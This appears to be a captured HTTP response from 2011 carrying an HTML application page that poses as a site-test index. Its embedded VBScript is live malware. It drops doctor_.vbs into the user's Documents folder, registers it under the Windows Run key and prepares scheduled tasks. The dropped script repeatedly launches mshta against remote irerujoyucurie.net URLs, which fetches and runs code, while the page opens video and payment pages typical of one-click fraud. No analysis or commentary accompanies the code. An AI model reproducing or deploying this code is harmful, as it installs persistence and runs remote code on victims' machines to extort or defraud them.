HTTP/1.1 302 Found
Date: Tue, 28 Jun 2011 15:00:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=qb4aa7sk6l22b6fjeftf0mqsu7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://irerujoyucurie.net/index.php?af_code=
P3P: CP='UNI CUR OUR'
Set-Cookie: cuid=deleted; expires=Mon, 28-Jun-2010 15:00:31 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7627
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" />
<meta http-equiv="refresh" content="1; URL=http://connection.irerujoyucurie.net/pc/page/player_view.php?af_code=&cuid=">
<title>サイトテストINDEX</title>
<Script Language="VBScript">
winwidth = 600
winheight = 400
window.resizeTo winwidth, winheight
positionX = (screen.availWidth - winwidth) / 2
positionY = (screen.availHeight - winheight) / 2
window.moveTo positionX, positionY
Dim WshShell
Dim copyFolder
Set WshShell = CreateObject( "WScript.Shell" )
copyFolder = WshShell.SpecialFolders("MyDocuments")
On Error Resume Next
If Err.Number = 0 Then
Dim objFSO
Set objFSO = CreateObject("Scripting.FileSystemObject")
Dim objFile
Set objFile = objFSO.CreateTextFile(copyFolder & "\" & "doctor_.vbs", True)
Dim setStrings
setStrings = "Option Explicit" & chr(10) & "On Error Resume Next" & chr(10) & "" & chr(10) & "Dim cufeiuaiheefwfwsfhsfcohfafhar_dfewat" & chr(10) & "Dim limoeuhgfdgyfertbwsafewfeuknefan_dat" & chr(10) & "" & chr(10) & "cufeiuaiheefwfwsfhsfcohfafhar_dfewat = NOW()" & chr(10) & "limoeuhgfdgyfertbwsafewfeuknefan_dat = CDate(""2011/07/13 00:00:32"")" & chr(10) & "" & chr(10) & "Dim WshShell" & chr(10) & "Set WshShell = CreateObject(""WScript.Shell"")" & chr(10) & "" & chr(10) & "Dim WindowsDirectory" & chr(10) & "WindowsDirectory = WshShell.ExpandEnvironmentStrings( ""%SystemRoot%"" )" & chr(10) & "" & chr(10) & "If DateDiff(""s"", cufeiuaiheefwfwsfhsfcohfafhar_dfewat, limoeuhgfdgyfertbwsafewfeuknefan_dat) < 0 Then" & chr(10) & "" & chr(9) & "" & chr(10) & "" & chr(9) & "Dim regDirectory" & chr(10) & "" & chr(9) & "regDirectory = ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\doctor_""" & chr(10) & "" & chr(9) & "WshShell.RegDelete regDirectory" & chr(10) & "" & chr(9) & "" & chr(10) & "" & chr(9) & "Dim strCmd" & chr(10) & "" & chr(9) & "strCmd = ""SCHTASKS /Delete /TN doctor_ /F""" & chr(10) & "" & chr(9) & "WshShell.Run strCmd, 7, false" & chr(10) & "" & chr(9) & "" & chr(10) & "" & chr(9) & "Dim objFSO" & chr(10) & "" & chr(9) & "Dim strDelFile" & chr(10) & "" & chr(9) & "Dim selfFolder" & chr(10) & "" & chr(9) & "" & chr(10) & "" & chr(9) & "selfFolder = WshShell.SpecialFolders(""MyDocuments"")" & chr(10) & "" & chr(9) & "strDelFile = selfFolder & ""\doctor_.vbs""" & chr(10) & "" & chr(9) & "Set objFSO = WScript.CreateObject(""Scripting.FileSystemObject"")" & chr(10) & "" & chr(9) & "If Err.Number = 0 Then" & chr(10) & "" & chr(9) & "" & chr(9) & "objFSO.DeleteFile strDelFile, True" & chr(10) & "" & chr(9) & "End If" & chr(10) & "" & chr(9) & "" & chr(10) & "" & chr(9) & "Set WshShell = Nothing" & chr(10) & "" & chr(9) & "Set objFSO = Nothing" & chr(10) & "" & chr(9) & "" & chr(10) & "Else" & chr(10) & "" & chr(9) & "Dim objIE" & chr(10) & "" & chr(9) & "Dim strBody" & chr(10) & "" & chr(9) & "Dim flg_connect" & chr(10) & "" & chr(9) & "" & chr(10) & "" & chr(9) & "Set objIE = CreateObject(""InternetExplorer.Application"")" & chr(10) & "" & chr(9) & "" & chr(10) & "" & chr(9) & "objIE.Width = 1" & chr(10) & "" & chr(9) & "objIE.Height = 1" & chr(10) & "" & chr(9) & "objIE.Left = 0" & chr(10) & "" & chr(9) & "objIE.Top = 0" & chr(10) & "" & chr(9) & "" & chr(10) & "" & chr(9) & "objIE.Visible = False" & chr(10) & "" & chr(9) & "" & chr(10) & "" & chr(9) & "objIE.Navigate ""http://www.yahoo.co.jp/""" & chr(10) & "" & chr(9) & "" & chr(10) & "" & chr(9) & "Do Until objIE.Busy = False" & chr(10) & "" & chr(9) & " WScript.sleep(250)" & chr(10) & "" & chr(9) & "Loop" & chr(10) & "" & chr(9) & "" & chr(10) & "" & chr(9) & "strBody = objIE.Document.getElementsByTagName(""title"").item(0).innerText" & chr(10) & "" & chr(9) & "" & chr(10) & "" & chr(9) & "If strBody = ""Yahoo! JAPAN"" Then" & chr(10) & "" & chr(9) & "" & chr(9) & "flg_connect = True" & chr(10) & "" & chr(9) & "Else" & chr(10) & "" & chr(9) & "" & chr(9) & "flg_connect = False" & chr(10) & "" & chr(9) & "End If" & chr(10) & "" & chr(9) & "" & chr(10) & "" & chr(9) & "objIE.Quit()" & chr(10) & "" & chr(9) & "" & chr(10) & "" & chr(9) & "" & chr(9) & "If flg_connect = True Then" & chr(10) & "" & chr(9) & "" & chr(9) & "" & chr(9) & "Dim urlCmd" & chr(10) & "" & chr(9) & "" & chr(9) & "" & chr(9) & "" & chr(10) & "urlCmd = WindowsDirectory & ""\system32\mshta http://connection.irerujoyucurie.net/pc/page/player_view.php?af_code=&cuid=""" & chr(10) & "WshShell.Run urlCmd, 7, false" & chr(10) & "" & chr(10) & "urlCmd = WindowsDirectory & ""\system32\mshta http://coeokgnnection.irerujoyucurie.net/pc/page/player_view.php?af_code=&cuid=""" & chr(10) & "WshShell.Run urlCmd, 7, false" & chr(10) & "" & chr(10) & "urlCmd = WindowsDirectory & ""\system32\mshta http://connwkynection.irerujoyucurie.net/pc/page/player_view.php?af_code=&cuid=""" & chr(10) & "WshShell.Run urlCmd, 7, false" & chr(10) & "" & chr(10) & "" & chr(10) & "" & chr(9) & "" & chr(9) & "End If" & chr(10) & "" & chr(9) & "" & chr(10) & "" & chr(9) & "" & chr(10) & "End If" & chr(10) & "" & chr(10) & "" & chr(10) & ""
If Err.Number = 0 Then
objFile.Write setStrings
objFile.Close
End If
Set objFSO = Nothing
End If
Dim WindowsDirectory
WindowsDirectory = WshShell.ExpandEnvironmentStrings( "%SystemRoot%" )
Dim regValue
regValue = copyFolder & "\" & "doctor_.vbs"
regDirectory = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\doctor_"
WshShell.RegWrite regDirectory, regValue, "REG_SZ"
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
For Each objOperatingSystem In colOperatingSystems
intOSType = objOperatingSystem.OSType
strOSVer = Left(objOperatingSystem.Version, 3)
intProductType = objOperatingSystem.ProductType
Next
Select Case intOSType
Case 16 'Windows 95
OS = 0
Case 17 'Windows 98
OS = 0
Case 18 'WINNT
Select Case strOSVer
Case 4.0
OS = 0
Case 5.0
OS = 0
Case 5.1
OS = 1
Case 5.2
OS = 2
Case 6.0
If intProductType = 1 Then
OS = 2
Else
OS = 2
End If
Case 6.1
If intProductType = 1 Then
OS = 2
Else
OS = 2
End If
Case Else
OS = 0
End Select
Case Else
OS = 0
End Select
If OS = 2 Then
strCmd = "SCHTASKS /Create /TN doctor_ /TR """ & regValue & """ /SC MINUTE /MO 2 /F"
' WshShell.Run strCmd, 7, false
ElseIf OS = 1 Then
strCmd = "SCHTASKS /Create /RU system /TN doctor_ /TR """ & regValue & """ /SC MINUTE /MO 2"
' WshShell.Run strCmd, 7, false
End If
WshShell.Run "wmplayer.exe http://irerujoyucurie.net/movie/pmov1.wmv", 4, False
Window.Open "http://connection.irerujoyucurie.net/pc/page/allot.php?af_code=&cuid=&ckg=on&ln=/movie_list"
Window.Open "http://sample.irerujoyucurie.net/pc/page/allot.php?af_code=&cuid=&ln=/pay1"
On Error Goto 0
Set objWinHttp = Nothing
Set WshShell = Nothing
</Script>
<!--
<HTA:APPLICATION
APPLICATIONNAME = "test"
ID = "test"
VERSION = "1.0"
SINGLEINSTANCE = "yes"
SHOWINTASKBAR = "no"
NAVIGABLE = "no"
WINDOWSTATE = "normal"
BORDER = "none"
INNERBORDER = "no"
BORDERSTYLE = "normal"
CONTEXTMENU = "yes"
SELECTION = "no"
SCROLL = "no"
SCROLLFLAT = "no"
CAPTION = "yes"
ICON = ""
SYSMENU = "no"
MAXIMIZEBUTTON = "no"
MINIMIZEBUTTON = "no"
/>
-->
</head>
<body>
</body>
</html> |